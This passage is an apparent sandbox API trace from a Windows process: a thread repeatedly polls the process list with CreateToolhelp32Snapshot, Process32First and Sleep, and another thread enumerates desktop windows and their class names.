th32ProcessID=0x0) returned 0x2434 [0300.738] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.956] Sleep (dwMilliseconds=0x64) [0300.963] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0300.976] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.041] Sleep (dwMilliseconds=0x64) [0301.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.053] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.103] Sleep (dwMilliseconds=0x64) [0301.106] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.118] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.168] Sleep (dwMilliseconds=0x64) [0301.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.180] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.248] Sleep (dwMilliseconds=0x64) [0301.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.265] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.336] Sleep (dwMilliseconds=0x64) [0301.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.353] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.407] Sleep (dwMilliseconds=0x64) [0301.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.423] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.477] Sleep (dwMilliseconds=0x64) [0301.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.493] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.562] Sleep (dwMilliseconds=0x64) [0301.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.594] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.665] Sleep (dwMilliseconds=0x64) [0301.672] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.690] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.763] Sleep (dwMilliseconds=0x64) [0301.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.783] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.874] Sleep (dwMilliseconds=0x64) [0301.877] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0301.893] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.989] Sleep (dwMilliseconds=0x64) [0302.005] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.082] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.159] Sleep (dwMilliseconds=0x64) [0302.161] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.176] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.254] Sleep (dwMilliseconds=0x64) [0302.257] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.268] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.356] Sleep (dwMilliseconds=0x64) [0302.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.378] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.446] Sleep (dwMilliseconds=0x64) [0302.448] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.464] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.527] Sleep (dwMilliseconds=0x64) [0302.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.544] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.682] Sleep (dwMilliseconds=0x64) [0302.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.701] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.766] Sleep (dwMilliseconds=0x64) [0302.769] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.786] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.854] Sleep (dwMilliseconds=0x64) [0302.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.871] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.933] Sleep (dwMilliseconds=0x64) [0302.938] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0302.982] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.070] Sleep (dwMilliseconds=0x64) [0303.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.090] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.165] Sleep (dwMilliseconds=0x64) [0303.167] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.187] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.326] Sleep (dwMilliseconds=0x64) [0303.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.346] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.406] Sleep (dwMilliseconds=0x64) [0303.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.422] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.499] Sleep (dwMilliseconds=0x64) [0303.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.515] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.609] Sleep (dwMilliseconds=0x64) [0303.628] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.641] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.697] Sleep (dwMilliseconds=0x64) [0303.698] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.722] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.780] Sleep (dwMilliseconds=0x64) [0303.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.796] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.860] Sleep (dwMilliseconds=0x64) [0303.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.880] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.948] Sleep (dwMilliseconds=0x64) [0303.955] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0303.970] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.040] Sleep (dwMilliseconds=0x64) [0304.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.054] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.119] Sleep (dwMilliseconds=0x64) [0304.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.143] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.212] Sleep (dwMilliseconds=0x64) [0304.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.232] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.304] Sleep (dwMilliseconds=0x64) [0304.318] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.333] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.392] Sleep (dwMilliseconds=0x64) [0304.396] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.417] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.469] Sleep (dwMilliseconds=0x64) [0304.472] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.482] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.539] Sleep (dwMilliseconds=0x64) [0304.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.554] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.679] Sleep (dwMilliseconds=0x64) [0304.681] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.692] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.751] Sleep (dwMilliseconds=0x64) [0304.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.766] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.825] Sleep (dwMilliseconds=0x64) [0304.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0304.837] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.891] Sleep (dwMilliseconds=0x64) [0304.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0304.933] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.002] Sleep (dwMilliseconds=0x64) [0305.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0305.021] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.077] Sleep (dwMilliseconds=0x64) [0305.081] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0305.095] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.167] Sleep (dwMilliseconds=0x64) [0305.169] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0305.183] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.257] Sleep (dwMilliseconds=0x64) [0305.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0305.275] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.363] Sleep (dwMilliseconds=0x64) [0305.366] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0305.383] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.471] Sleep (dwMilliseconds=0x64) [0305.477] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0305.494] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.783] Sleep (dwMilliseconds=0x64) [0305.852] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0305.863] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.904] Sleep (dwMilliseconds=0x64) [0308.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0308.232] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 50 os_tid = 0x13a0 [0108.516] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) returned 1 [0108.517] GetClassNameA (in: hWnd=0x100de, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0108.517] GetClassNameA (in: hWnd=0x10134, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0108.517] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0108.517] GetClassNameA (in: hWnd=0x10106, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.517] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.517] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.517] GetClassNameA (in: hWnd=0x10108, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.517] GetClassNameA (in: hWnd=0x10104, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.517] GetClassNameA (in: hWnd=0x10102, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0108.517] GetClassNameA (in: hWnd=0x10100, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.518] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.518] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0108.518] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0108.518] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0108.518] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.518] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0108.518] GetClassNameA (in: hWnd=0x10198, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0108.518] GetClassNameA (in: hWnd=0x10196, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0000000005F36930-19d0c58") returned 36 [0108.518] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0108.518] GetClassNameA (in: hWnd=0x10188, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0108.518] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.518] GetClassNameA (in: hWnd=0x100a2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.518] GetClassNameA (in: hWnd=0x100a6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.518] GetClassNameA (in: hWnd=0x100b4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.518] GetClassNameA (in: hWnd=0x100be, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.518] GetClassNameA (in: 